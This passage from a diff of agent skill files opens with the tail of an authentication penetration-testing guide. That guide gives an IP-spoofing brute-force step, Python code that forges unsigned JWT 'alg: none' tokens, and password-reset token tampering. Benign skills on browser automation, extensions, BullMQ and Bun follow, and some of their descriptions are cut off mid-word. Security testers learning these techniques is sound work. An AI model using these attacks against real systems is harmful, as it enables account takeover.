X-Forwarded-For: 192.168.1.2
# Continue until successful or confirmed blocked

# Step 3: Test bypass via case manipulation
username=Admin (vs admin)
username=ADMIN
# Some systems treat these as different accounts
```

### Example 2: JWT Token Attack

**Scenario:** Exploit weak JWT implementation

```bash
# Step 1: Capture JWT token
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCJ9.signature

# Step 2: Decode and analyze
# Header: {"alg":"HS256","typ":"JWT"}
# Payload: {"user":"test","role":"user"}

# Step 3: Try "none" algorithm attack
# Change header to: {"alg":"none","typ":"JWT"}
# Remove signature
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4iLCJyb2xlIjoiYWRtaW4ifQ.

# Step 4: Submit modified token
Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
```
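
Step 3's forged token can be built with the standard library alone: base64url-encode the modified header and payload without padding, and leave the third (signature) segment empty:

```python
import base64
import json

def b64url(raw: bytes) -> str:
    """Base64url without padding, as JWT segments require."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def unsigned_jwt(payload: dict) -> str:
    """Forge an alg=none token: header.payload. with an empty signature."""
    header = b64url(json.dumps({"alg": "none", "typ": "JWT"},
                               separators=(",", ":")).encode())
    body = b64url(json.dumps(payload, separators=(",", ":")).encode())
    return f"{header}.{body}."

print(unsigned_jwt({"user": "admin", "role": "admin"}))
```

A correct implementation rejects `alg: none` outright (and pins the expected algorithm server-side); if the forged token is accepted, the finding is critical.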

### Example 3: Password Reset Token Exploitation

**Scenario:** Test password reset functionality

```bash
# Step 1: Request reset for test account
POST /forgot-password
email=test@example.com

# Step 2: Capture reset link
https://target.com/reset?token=a1b2c3d4e5f6

# Step 3: Test token properties
# Reuse: Try using same token twice
# Expiration: Wait 24+ hours and retry
# Modification: Change characters in token

# Step 4: Test for user parameter manipulation
https://target.com/reset?token=a1b2c3d4e5f6&email=admin@example.com
# Check if admin's password can be reset with test user's token
```

## Troubleshooting

| Issue | Solutions |
|-------|-----------|
| Brute force too slow | Identify rate limit scope; IP rotation; add delays; use targeted wordlists |
| Session analysis inconclusive | Collect 1000+ tokens; use statistical tools; check for timestamps; compare accounts |
| MFA cannot be bypassed | Document as secure; test backup/recovery mechanisms; check MFA fatigue; verify enrollment |
| Account lockout prevents testing | Request multiple test accounts; test threshold first; use slower timing |
70
skills/browser-automation/SKILL.md
Normal file
@@ -0,0 +1,70 @@
---
|
||||
name: browser-automation
|
||||
description: "Browser automation powers web testing, scraping, and AI agent interactions. The difference between a flaky script and a reliable system comes down to understanding selectors, waiting strategies, and anti-detection patterns. This skill covers Playwright (recommended) and Puppeteer, with patterns for testing, scraping, and agentic browser control. Key insight: Playwright won the framework war. Unless you need Puppeteer's stealth ecosystem or are Chrome-only, Playwright is the better choice in 202"
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Browser Automation
|
||||
|
||||
You are a browser automation expert who has debugged thousands of flaky tests
|
||||
and built scrapers that run for years without breaking. You've seen the
|
||||
evolution from Selenium to Puppeteer to Playwright and understand exactly
|
||||
when each tool shines.
|
||||
|
||||
Your core insight: Most automation failures come from three sources - bad
|
||||
selectors, missing waits, and detection systems. You teach people to think
|
||||
like the browser, use the right selectors, and let Playwright's auto-wait
|
||||
do its job.
|
||||
|
||||
For scraping, yo
|
||||
|
||||
## Capabilities
|
||||
|
||||
- browser-automation
|
||||
- playwright
|
||||
- puppeteer
|
||||
- headless-browsers
|
||||
- web-scraping
|
||||
- browser-testing
|
||||
- e2e-testing
|
||||
- ui-automation
|
||||
- selenium-alternatives
|
||||
|
||||
## Patterns
|
||||
|
||||
### Test Isolation Pattern
|
||||
|
||||
Each test runs in complete isolation with fresh state
|
||||
|
||||
### User-Facing Locator Pattern
|
||||
|
||||
Select elements the way users see them
|
||||
|
||||
### Auto-Wait Pattern
|
||||
|
||||
Let Playwright wait automatically, never add manual waits
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Arbitrary Timeouts
|
||||
|
||||
### ❌ CSS/XPath First
|
||||
|
||||
### ❌ Single Browser Context for Everything
|
||||
|
||||
## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Manual `waitForTimeout` sleeps | critical | Remove all `waitForTimeout` calls; rely on auto-wait |
| Brittle CSS/XPath selectors | high | Use user-facing locators instead |
| Bot detection blocks automation | high | Use stealth plugins |
| Shared state leaks between tests | high | Each test must be fully isolated |
| Failures are hard to debug | medium | Enable traces for failures |
| Inconsistent screenshots and layout | medium | Set a consistent viewport |
| Scraping triggers rate limits or bans | high | Add delays between requests |
| Popup events missed | medium | Wait for the popup BEFORE triggering it |
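
The "add delays between requests" fix is usually a jittered pause between fetches. A minimal sketch (hypothetical helper names, not from any library):

```javascript
// Jittered delay: base interval +/- a random spread, so request timing
// doesn't form a detectable fixed-rate pattern.
function jitteredDelayMs(baseMs, jitter = 0.5) {
  const spread = baseMs * jitter;
  return baseMs - spread + Math.random() * 2 * spread;
}

// Fetch URLs one at a time with a polite pause between them.
async function politeCrawl(urls, fetchOne, baseMs = 1000) {
  const results = [];
  for (const url of urls) {
    results.push(await fetchOne(url));
    await new Promise((resolve) => setTimeout(resolve, jitteredDelayMs(baseMs)));
  }
  return results;
}
```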
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `agent-tool-builder`, `workflow-automation`, `computer-use-agents`, `test-architect`
|
||||
|
||||
---
|
||||
name: browser-extension-builder
|
||||
description: "Expert in building browser extensions that solve real problems - Chrome, Firefox, and cross-browser extensions. Covers extension architecture, manifest v3, content scripts, popup UIs, monetization strategies, and Chrome Web Store publishing. Use when: browser extension, chrome extension, firefox addon, extension, manifest v3."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Browser Extension Builder
|
||||
|
||||
**Role**: Browser Extension Architect
|
||||
|
||||
You extend the browser to give users superpowers. You understand the
|
||||
unique constraints of extension development - permissions, security,
|
||||
store policies. You build extensions that people install and actually
|
||||
use daily. You know the difference between a toy and a tool.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- Extension architecture
|
||||
- Manifest v3 (MV3)
|
||||
- Content scripts
|
||||
- Background workers
|
||||
- Popup interfaces
|
||||
- Extension monetization
|
||||
- Chrome Web Store publishing
|
||||
- Cross-browser support
|
||||
|
||||
## Patterns
|
||||
|
||||
### Extension Architecture
|
||||
|
||||
Structure for modern browser extensions
|
||||
|
||||
**When to use**: When starting a new extension
|
||||
|
||||
#### Project Structure

```
extension/
├── manifest.json              # Extension config
├── popup/
│   ├── popup.html             # Popup UI
│   ├── popup.css
│   └── popup.js
├── content/
│   └── content.js             # Runs on web pages
├── background/
│   └── service-worker.js      # Background logic
├── options/
│   ├── options.html           # Settings page
│   └── options.js
└── icons/
    ├── icon16.png
    ├── icon48.png
    └── icon128.png
```

#### Manifest V3 Template

```json
{
  "manifest_version": 3,
  "name": "My Extension",
  "version": "1.0.0",
  "description": "What it does",
  "permissions": ["storage", "activeTab"],
  "action": {
    "default_popup": "popup/popup.html",
    "default_icon": {
      "16": "icons/icon16.png",
      "48": "icons/icon48.png",
      "128": "icons/icon128.png"
    }
  },
  "content_scripts": [{
    "matches": ["<all_urls>"],
    "js": ["content/content.js"]
  }],
  "background": {
    "service_worker": "background/service-worker.js"
  },
  "options_page": "options/options.html"
}
```

#### Communication Pattern

```
Popup ←→ Background (Service Worker) ←→ Content Script
                    ↓
              chrome.storage
```
|
||||
|
||||
### Content Scripts
|
||||
|
||||
Code that runs on web pages
|
||||
|
||||
**When to use**: When modifying or reading page content
|
||||
|
||||
#### Basic Content Script

```javascript
// content.js - Runs on every matched page

// Wait for page to load
document.addEventListener('DOMContentLoaded', () => {
  // Modify the page
  const element = document.querySelector('.target');
  if (element) {
    element.style.backgroundColor = 'yellow';
  }
});

// Listen for messages from popup/background
chrome.runtime.onMessage.addListener((message, sender, sendResponse) => {
  if (message.action === 'getData') {
    const data = document.querySelector('.data')?.textContent;
    sendResponse({ data });
  }
  return true; // Keep channel open for async
});
```

#### Injecting UI

```javascript
// Create floating UI on page
function injectUI() {
  const container = document.createElement('div');
  container.id = 'my-extension-ui';
  container.innerHTML = `
    <div style="position: fixed; bottom: 20px; right: 20px;
                background: white; padding: 16px; border-radius: 8px;
                box-shadow: 0 4px 12px rgba(0,0,0,0.15); z-index: 10000;">
      <h3>My Extension</h3>
      <button id="my-extension-btn">Click me</button>
    </div>
  `;
  document.body.appendChild(container);

  document.getElementById('my-extension-btn').addEventListener('click', () => {
    // Handle click
  });
}

injectUI();
```

#### Permissions for Content Scripts

```json
{
  "content_scripts": [{
    "matches": ["https://specific-site.com/*"],
    "js": ["content.js"],
    "run_at": "document_end"
  }]
}
```
|
||||
|
||||
### Storage and State
|
||||
|
||||
Persisting extension data
|
||||
|
||||
**When to use**: When saving user settings or data
|
||||
|
||||
#### Chrome Storage API

```javascript
// Save data
chrome.storage.local.set({ key: 'value' }, () => {
  console.log('Saved');
});

// Get data
chrome.storage.local.get(['key'], (result) => {
  console.log(result.key);
});

// Sync storage (syncs across devices)
chrome.storage.sync.set({ setting: true });

// Watch for changes
chrome.storage.onChanged.addListener((changes, area) => {
  if (changes.key) {
    console.log('key changed:', changes.key.newValue);
  }
});
```

#### Storage Limits

| Type | Limit |
|------|-------|
| local | 5MB |
| sync | 100KB total, 8KB per item |

#### Async/Await Pattern

```javascript
// Modern async wrapper
async function getStorage(keys) {
  return new Promise((resolve) => {
    chrome.storage.local.get(keys, resolve);
  });
}

async function setStorage(data) {
  return new Promise((resolve) => {
    chrome.storage.local.set(data, resolve);
  });
}

// Usage
const { settings } = await getStorage(['settings']);
await setStorage({ settings: { ...settings, theme: 'dark' } });
```
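
Those sync limits are easy to trip over. A quick size check before writing (hypothetical helper, using the 8KB-per-item figure from the limits table):

```javascript
// chrome.storage.sync rejects items larger than ~8KB once serialized.
// Check the serialized size before attempting the write.
const SYNC_QUOTA_BYTES_PER_ITEM = 8192;

function fitsInSyncItem(value) {
  const bytes = new TextEncoder().encode(JSON.stringify(value)).length;
  return bytes <= SYNC_QUOTA_BYTES_PER_ITEM;
}
```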
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Requesting All Permissions
|
||||
|
||||
**Why bad**: Users won't install.
|
||||
Store may reject.
|
||||
Security risk.
|
||||
Bad reviews.
|
||||
|
||||
**Instead**: Request minimum needed.
|
||||
Use optional permissions.
|
||||
Explain why in description.
|
||||
Request at time of use.
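
Concretely, "use optional permissions" looks like this in the manifest (a sketch; the permission names are examples):

```json
{
  "permissions": ["storage"],
  "optional_permissions": ["tabs"],
  "optional_host_permissions": ["https://*/*"]
}
```

At the moment the feature is used, call `chrome.permissions.request({ permissions: ["tabs"] })` so the browser prompts in context instead of at install time.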
|
||||
|
||||
### ❌ Heavy Background Processing
|
||||
|
||||
**Why bad**: MV3 terminates idle workers.
|
||||
Battery drain.
|
||||
Browser slows down.
|
||||
Users uninstall.
|
||||
|
||||
**Instead**: Keep background minimal.
|
||||
Use alarms for periodic tasks.
|
||||
Offload to content scripts.
|
||||
Cache aggressively.
|
||||
|
||||
### ❌ Breaking on Updates
|
||||
|
||||
**Why bad**: Selectors change.
|
||||
APIs change.
|
||||
Angry users.
|
||||
Bad reviews.
|
||||
|
||||
**Instead**: Use stable selectors.
|
||||
Add error handling.
|
||||
Monitor for breakage.
|
||||
Update quickly when broken.
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `frontend`, `micro-saas-launcher`, `personal-tool-builder`
|
||||
|
||||
---
|
||||
name: bullmq-specialist
|
||||
description: "BullMQ expert for Redis-backed job queues, background processing, and reliable async execution in Node.js/TypeScript applications. Use when: bullmq, bull queue, redis queue, background job, job queue."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# BullMQ Specialist
|
||||
|
||||
You are a BullMQ expert who has processed billions of jobs in production.
|
||||
You understand that queues are the backbone of scalable applications - they
|
||||
decouple services, smooth traffic spikes, and enable reliable async processing.
|
||||
|
||||
You've debugged stuck jobs at 3am, optimized worker concurrency for maximum
|
||||
throughput, and designed job flows that handle complex multi-step processes.
|
||||
You know that most queue problems are actually Redis problems or application
|
||||
design problems.
|
||||
|
||||
|
||||
|
||||
## Capabilities
|
||||
|
||||
- bullmq-queues
|
||||
- job-scheduling
|
||||
- delayed-jobs
|
||||
- repeatable-jobs
|
||||
- job-priorities
|
||||
- rate-limiting-jobs
|
||||
- job-events
|
||||
- worker-patterns
|
||||
- flow-producers
|
||||
- job-dependencies
|
||||
|
||||
## Patterns
|
||||
|
||||
### Basic Queue Setup
|
||||
|
||||
Production-ready BullMQ queue with proper configuration
|
||||
|
||||
### Delayed and Scheduled Jobs
|
||||
|
||||
Jobs that run at specific times or after delays
|
||||
|
||||
### Job Flows and Dependencies
|
||||
|
||||
Complex multi-step job processing with parent-child relationships
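
Retries underpin all of these patterns. As a sketch of how exponential backoff spacing is typically computed (this mirrors the common formula; check BullMQ's docs for its exact behavior):

```javascript
// Exponential backoff: attempt 1 waits delayMs, attempt 2 waits 2x,
// attempt 3 waits 4x, and so on.
function backoffDelayMs(attemptsMade, delayMs) {
  return Math.pow(2, attemptsMade - 1) * delayMs;
}
```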
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Giant Job Payloads
|
||||
|
||||
### ❌ No Dead Letter Queue
|
||||
|
||||
### ❌ Infinite Concurrency
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `redis-specialist`, `backend`, `nextjs-app-router`, `email-systems`, `ai-workflow-automation`, `performance-hunter`
|
||||
|
||||
---
|
||||
name: bun-development
|
||||
description: "Modern JavaScript/TypeScript development with Bun runtime. Covers package management, bundling, testing, and migration from Node.js. Use when working with Bun, optimizing JS/TS development speed, or migrating from Node.js to Bun."
|
||||
---
|
||||
|
||||
# ⚡ Bun Development
|
||||
|
||||
> Fast, modern JavaScript/TypeScript development with the Bun runtime, inspired by [oven-sh/bun](https://github.com/oven-sh/bun).
|
||||
|
||||
## When to Use This Skill
|
||||
|
||||
Use this skill when:
|
||||
|
||||
- Starting new JS/TS projects with Bun
|
||||
- Migrating from Node.js to Bun
|
||||
- Optimizing development speed
|
||||
- Using Bun's built-in tools (bundler, test runner)
|
||||
- Troubleshooting Bun-specific issues
|
||||
|
||||
---
|
||||
|
||||
## 1. Getting Started
|
||||
|
||||
### 1.1 Installation
|
||||
|
||||
```bash
|
||||
# macOS / Linux
|
||||
curl -fsSL https://bun.sh/install | bash
|
||||
|
||||
# Windows
|
||||
powershell -c "irm bun.sh/install.ps1 | iex"
|
||||
|
||||
# Homebrew
|
||||
brew tap oven-sh/bun
|
||||
brew install bun
|
||||
|
||||
# npm (if needed)
|
||||
npm install -g bun
|
||||
|
||||
# Upgrade
|
||||
bun upgrade
|
||||
```
|
||||
|
||||
### 1.2 Why Bun?
|
||||
|
||||
| Feature | Bun | Node.js |
|
||||
| :-------------- | :------------- | :-------------------------- |
|
||||
| Startup time | ~25ms | ~100ms+ |
|
||||
| Package install | 10-100x faster | Baseline |
|
||||
| TypeScript | Native | Requires transpiler |
|
||||
| JSX | Native | Requires transpiler |
|
||||
| Test runner | Built-in | External (Jest, Vitest) |
|
||||
| Bundler | Built-in | External (Webpack, esbuild) |
|
||||
|
||||
---
|
||||
|
||||
## 2. Project Setup
|
||||
|
||||
### 2.1 Create New Project
|
||||
|
||||
```bash
|
||||
# Initialize project
|
||||
bun init
|
||||
|
||||
# Creates:
|
||||
# ├── package.json
|
||||
# ├── tsconfig.json
|
||||
# ├── index.ts
|
||||
# └── README.md
|
||||
|
||||
# With specific template
|
||||
bun create <template> <project-name>
|
||||
|
||||
# Examples
|
||||
bun create react my-app # React app
|
||||
bun create next my-app # Next.js app
|
||||
bun create vite my-app # Vite app
|
||||
bun create elysia my-api # Elysia API
|
||||
```
|
||||
|
||||
### 2.2 package.json
|
||||
|
||||
```json
|
||||
{
|
||||
"name": "my-bun-project",
|
||||
"version": "1.0.0",
|
||||
"module": "index.ts",
|
||||
"type": "module",
|
||||
"scripts": {
|
||||
"dev": "bun run --watch index.ts",
|
||||
"start": "bun run index.ts",
|
||||
"test": "bun test",
|
||||
"build": "bun build ./index.ts --outdir ./dist",
|
||||
"lint": "bunx eslint ."
|
||||
},
|
||||
"devDependencies": {
|
||||
"@types/bun": "latest"
|
||||
},
|
||||
"peerDependencies": {
|
||||
"typescript": "^5.0.0"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### 2.3 tsconfig.json (Bun-optimized)
|
||||
|
||||
```json
|
||||
{
|
||||
"compilerOptions": {
|
||||
"lib": ["ESNext"],
|
||||
"module": "esnext",
|
||||
"target": "esnext",
|
||||
"moduleResolution": "bundler",
|
||||
"moduleDetection": "force",
|
||||
"allowImportingTsExtensions": true,
|
||||
"noEmit": true,
|
||||
"composite": true,
|
||||
"strict": true,
|
||||
"downlevelIteration": true,
|
||||
"skipLibCheck": true,
|
||||
"jsx": "react-jsx",
|
||||
"allowSyntheticDefaultImports": true,
|
||||
"forceConsistentCasingInFileNames": true,
|
||||
"allowJs": true,
|
||||
"types": ["bun-types"]
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 3. Package Management
|
||||
|
||||
### 3.1 Installing Packages
|
||||
|
||||
```bash
|
||||
# Install from package.json
|
||||
bun install # or 'bun i'
|
||||
|
||||
# Add dependencies
|
||||
bun add express # Regular dependency
|
||||
bun add -d typescript # Dev dependency
|
||||
bun add -D @types/node # Dev dependency (alias)
|
||||
bun add --optional pkg # Optional dependency
|
||||
|
||||
# From specific registry
|
||||
bun add lodash --registry https://registry.npmmirror.com
|
||||
|
||||
# Install specific version
|
||||
bun add react@18.2.0
|
||||
bun add react@latest
|
||||
bun add react@next
|
||||
|
||||
# From git
|
||||
bun add github:user/repo
|
||||
bun add git+https://github.com/user/repo.git
|
||||
```
|
||||
|
||||
### 3.2 Removing & Updating
|
||||
|
||||
```bash
|
||||
# Remove package
|
||||
bun remove lodash
|
||||
|
||||
# Update packages
|
||||
bun update # Update all
|
||||
bun update lodash # Update specific
|
||||
bun update --latest # Update to latest (ignore ranges)
|
||||
|
||||
# Check outdated
|
||||
bun outdated
|
||||
```
|
||||
|
||||
### 3.3 bunx (npx equivalent)
|
||||
|
||||
```bash
|
||||
# Execute package binaries
|
||||
bunx prettier --write .
|
||||
bunx tsc --init
|
||||
bunx create-react-app my-app
|
||||
|
||||
# With specific version
|
||||
bunx -p typescript@4.9 tsc --version
|
||||
|
||||
# Run without installing
|
||||
bunx cowsay "Hello from Bun!"
|
||||
```
|
||||
|
||||
### 3.4 Lockfile
|
||||
|
||||
```bash
|
||||
# bun.lockb is a binary lockfile (faster parsing)
|
||||
# To generate text lockfile for debugging:
|
||||
bun install --yarn # Creates yarn.lock
|
||||
|
||||
# Trust existing lockfile
|
||||
bun install --frozen-lockfile
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 4. Running Code
|
||||
|
||||
### 4.1 Basic Execution
|
||||
|
||||
```bash
|
||||
# Run TypeScript directly (no build step!)
|
||||
bun run index.ts
|
||||
|
||||
# Run JavaScript
|
||||
bun run index.js
|
||||
|
||||
# Run with arguments
|
||||
bun run server.ts --port 3000
|
||||
|
||||
# Run package.json script
|
||||
bun run dev
|
||||
bun run build
|
||||
|
||||
# Short form (for scripts)
|
||||
bun dev
|
||||
bun build
|
||||
```
|
||||
|
||||
### 4.2 Watch Mode
|
||||
|
||||
```bash
|
||||
# Auto-restart on file changes
|
||||
bun --watch run index.ts
|
||||
|
||||
# With hot reloading
|
||||
bun --hot run server.ts
|
||||
```
|
||||
|
||||
### 4.3 Environment Variables
|
||||
|
||||
```typescript
|
||||
// .env file is loaded automatically!
|
||||
|
||||
// Access environment variables
|
||||
const apiKey = Bun.env.API_KEY;
|
||||
const port = Bun.env.PORT ?? "3000";
|
||||
|
||||
// Or use process.env (Node.js compatible)
|
||||
const dbUrl = process.env.DATABASE_URL;
|
||||
```
|
||||
|
||||
```bash
|
||||
# Run with specific env file
|
||||
bun --env-file=.env.production run index.ts
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 5. Built-in APIs
|
||||
|
||||
### 5.1 File System (Bun.file)
|
||||
|
||||
```typescript
|
||||
// Read file
|
||||
const file = Bun.file("./data.json");
|
||||
const text = await file.text();
|
||||
const json = await file.json();
|
||||
const buffer = await file.arrayBuffer();
|
||||
|
||||
// File info
|
||||
console.log(file.size); // bytes
|
||||
console.log(file.type); // MIME type
|
||||
|
||||
// Write file
|
||||
await Bun.write("./output.txt", "Hello, Bun!");
|
||||
await Bun.write("./data.json", JSON.stringify({ foo: "bar" }));
|
||||
|
||||
// Stream large files
|
||||
const reader = file.stream();
|
||||
for await (const chunk of reader) {
|
||||
console.log(chunk);
|
||||
}
|
||||
```
|
||||
|
||||
### 5.2 HTTP Server (Bun.serve)
|
||||
|
||||
```typescript
|
||||
const server = Bun.serve({
|
||||
port: 3000,
|
||||
|
||||
fetch(request) {
|
||||
const url = new URL(request.url);
|
||||
|
||||
if (url.pathname === "/") {
|
||||
return new Response("Hello World!");
|
||||
}
|
||||
|
||||
if (url.pathname === "/api/users") {
|
||||
return Response.json([
|
||||
{ id: 1, name: "Alice" },
|
||||
{ id: 2, name: "Bob" },
|
||||
]);
|
||||
}
|
||||
|
||||
return new Response("Not Found", { status: 404 });
|
||||
},
|
||||
|
||||
error(error) {
|
||||
return new Response(`Error: ${error.message}`, { status: 500 });
|
||||
},
|
||||
});
|
||||
|
||||
console.log(`Server running at http://localhost:${server.port}`);
|
||||
```
|
||||
|
||||
### 5.3 WebSocket Server
|
||||
|
||||
```typescript
|
||||
const server = Bun.serve({
|
||||
port: 3000,
|
||||
|
||||
fetch(req, server) {
|
||||
// Upgrade to WebSocket
|
||||
if (server.upgrade(req)) {
|
||||
return; // Upgraded
|
||||
}
|
||||
return new Response("Upgrade failed", { status: 500 });
|
||||
},
|
||||
|
||||
websocket: {
|
||||
open(ws) {
|
||||
console.log("Client connected");
|
||||
ws.send("Welcome!");
|
||||
},
|
||||
|
||||
message(ws, message) {
|
||||
console.log(`Received: ${message}`);
|
||||
ws.send(`Echo: ${message}`);
|
||||
},
|
||||
|
||||
close(ws) {
|
||||
console.log("Client disconnected");
|
||||
},
|
||||
},
|
||||
});
|
||||
```
|
||||
|
||||
### 5.4 SQLite (`bun:sqlite`)
|
||||
|
||||
```typescript
|
||||
import { Database } from "bun:sqlite";
|
||||
|
||||
const db = new Database("mydb.sqlite");
|
||||
|
||||
// Create table
|
||||
db.run(`
|
||||
CREATE TABLE IF NOT EXISTS users (
|
||||
id INTEGER PRIMARY KEY AUTOINCREMENT,
|
||||
name TEXT NOT NULL,
|
||||
email TEXT UNIQUE
|
||||
)
|
||||
`);
|
||||
|
||||
// Insert
|
||||
const insert = db.prepare("INSERT INTO users (name, email) VALUES (?, ?)");
|
||||
insert.run("Alice", "alice@example.com");
|
||||
|
||||
// Query
|
||||
const query = db.prepare("SELECT * FROM users WHERE name = ?");
|
||||
const user = query.get("Alice");
|
||||
console.log(user); // { id: 1, name: "Alice", email: "alice@example.com" }
|
||||
|
||||
// Query all
|
||||
const allUsers = db.query("SELECT * FROM users").all();
|
||||
```
|
||||
|
||||
### 5.5 Password Hashing
|
||||
|
||||
```typescript
|
||||
// Hash password
|
||||
const password = "super-secret";
|
||||
const hash = await Bun.password.hash(password);
|
||||
|
||||
// Verify password
|
||||
const isValid = await Bun.password.verify(password, hash);
|
||||
console.log(isValid); // true
|
||||
|
||||
// With algorithm options
|
||||
const bcryptHash = await Bun.password.hash(password, {
|
||||
algorithm: "bcrypt",
|
||||
cost: 12,
|
||||
});
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 6. Testing
|
||||
|
||||
### 6.1 Basic Tests
|
||||
|
||||
```typescript
|
||||
// math.test.ts
|
||||
import { describe, it, expect, beforeAll, afterAll } from "bun:test";
|
||||
|
||||
describe("Math operations", () => {
|
||||
it("adds two numbers", () => {
|
||||
expect(1 + 1).toBe(2);
|
||||
});
|
||||
|
||||
it("subtracts two numbers", () => {
|
||||
expect(5 - 3).toBe(2);
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
### 6.2 Running Tests
|
||||
|
||||
```bash
|
||||
# Run all tests
|
||||
bun test
|
||||
|
||||
# Run specific file
|
||||
bun test math.test.ts
|
||||
|
||||
# Run matching pattern
|
||||
bun test -t "adds"          # or --test-name-pattern
|
||||
|
||||
# Watch mode
|
||||
bun test --watch
|
||||
|
||||
# With coverage
|
||||
bun test --coverage
|
||||
|
||||
# Timeout
|
||||
bun test --timeout 5000
|
||||
```
|
||||
|
||||
### 6.3 Matchers
|
||||
|
||||
```typescript
|
||||
import { expect, test } from "bun:test";
|
||||
|
||||
test("matchers", async () => {
|
||||
// Equality
|
||||
expect(1).toBe(1);
|
||||
expect({ a: 1 }).toEqual({ a: 1 });
|
||||
expect([1, 2]).toContain(1);
|
||||
|
||||
// Comparisons
|
||||
expect(10).toBeGreaterThan(5);
|
||||
expect(5).toBeLessThanOrEqual(5);
|
||||
|
||||
// Truthiness
|
||||
expect(true).toBeTruthy();
|
||||
expect(null).toBeNull();
|
||||
expect(undefined).toBeUndefined();
|
||||
|
||||
// Strings
|
||||
expect("hello").toMatch(/ell/);
|
||||
expect("hello").toContain("ell");
|
||||
|
||||
// Arrays
|
||||
expect([1, 2, 3]).toHaveLength(3);
|
||||
|
||||
// Exceptions
|
||||
expect(() => {
|
||||
throw new Error("fail");
|
||||
}).toThrow("fail");
|
||||
|
||||
// Async
|
||||
await expect(Promise.resolve(1)).resolves.toBe(1);
|
||||
await expect(Promise.reject("err")).rejects.toBe("err");
|
||||
});
|
||||
```
|
||||
|
||||
### 6.4 Mocking
|
||||
|
||||
```typescript
|
||||
import { mock, spyOn } from "bun:test";
|
||||
|
||||
// Mock function
|
||||
const mockFn = mock((x: number) => x * 2);
|
||||
mockFn(5);
|
||||
expect(mockFn).toHaveBeenCalled();
|
||||
expect(mockFn).toHaveBeenCalledWith(5);
|
||||
expect(mockFn.mock.results[0].value).toBe(10);
|
||||
|
||||
// Spy on method
|
||||
const obj = {
|
||||
method: () => "original",
|
||||
};
|
||||
const spy = spyOn(obj, "method").mockReturnValue("mocked");
|
||||
expect(obj.method()).toBe("mocked");
|
||||
expect(spy).toHaveBeenCalled();
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 7. Bundling
|
||||
|
||||
### 7.1 Basic Build
|
||||
|
||||
```bash
|
||||
# Bundle for production
|
||||
bun build ./src/index.ts --outdir ./dist
|
||||
|
||||
# With options
|
||||
bun build ./src/index.ts \
|
||||
--outdir ./dist \
|
||||
--target browser \
|
||||
--minify \
|
||||
--sourcemap
|
||||
```
|
||||
|
||||
### 7.2 Build API
|
||||
|
||||
```typescript
|
||||
const result = await Bun.build({
|
||||
entrypoints: ["./src/index.ts"],
|
||||
outdir: "./dist",
|
||||
target: "browser", // or "bun", "node"
|
||||
minify: true,
|
||||
sourcemap: "external",
|
||||
splitting: true,
|
||||
format: "esm",
|
||||
|
||||
// External packages (not bundled)
|
||||
external: ["react", "react-dom"],
|
||||
|
||||
// Define globals
|
||||
define: {
|
||||
"process.env.NODE_ENV": JSON.stringify("production"),
|
||||
},
|
||||
|
||||
// Naming
|
||||
naming: {
|
||||
entry: "[name].[hash].js",
|
||||
chunk: "chunks/[name].[hash].js",
|
||||
asset: "assets/[name].[hash][ext]",
|
||||
},
|
||||
});
|
||||
|
||||
if (!result.success) {
|
||||
console.error(result.logs);
|
||||
}
|
||||
```
|
||||
|
||||
### 7.3 Compile to Executable
|
||||
|
||||
```bash
|
||||
# Create standalone executable
|
||||
bun build ./src/cli.ts --compile --outfile myapp
|
||||
|
||||
# Cross-compile
|
||||
bun build ./src/cli.ts --compile --target=bun-linux-x64 --outfile myapp-linux
|
||||
bun build ./src/cli.ts --compile --target=bun-darwin-arm64 --outfile myapp-mac
|
||||
|
||||
# With embedded assets
|
||||
bun build ./src/cli.ts --compile --outfile myapp --embed ./assets
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 8. Migration from Node.js
|
||||
|
||||
### 8.1 Compatibility
|
||||
|
||||
```typescript
|
||||
// Most Node.js APIs work out of the box
|
||||
import fs from "fs";
|
||||
import path from "path";
|
||||
import crypto from "crypto";
|
||||
|
||||
// process is global
|
||||
console.log(process.cwd());
|
||||
console.log(process.env.HOME);
|
||||
|
||||
// Buffer is global
|
||||
const buf = Buffer.from("hello");
|
||||
|
||||
// __dirname and __filename work
|
||||
console.log(__dirname);
|
||||
console.log(__filename);
|
||||
```
|
||||
|
||||
### 8.2 Common Migration Steps
|
||||
|
||||
```bash
|
||||
# 1. Install Bun
|
||||
curl -fsSL https://bun.sh/install | bash
|
||||
|
||||
# 2. Replace package manager
|
||||
rm -rf node_modules package-lock.json
|
||||
bun install
|
||||
|
||||
# 3. Update scripts in package.json
|
||||
# "start": "node index.js" → "start": "bun run index.ts"
|
||||
# "test": "jest" → "test": "bun test"
|
||||
|
||||
# 4. Add Bun types
|
||||
bun add -d @types/bun
|
||||
```
|
||||
|
||||
### 8.3 Differences from Node.js
|
||||
|
||||
```typescript
|
||||
// ❌ Node.js specific (may not work)
|
||||
require("module") // Use import instead
|
||||
require.resolve("pkg") // Use import.meta.resolve
|
||||
__non_webpack_require__ // Not supported
|
||||
|
||||
// ✅ Bun equivalents
|
||||
import pkg from "pkg";
|
||||
const resolved = import.meta.resolve("pkg");
|
||||
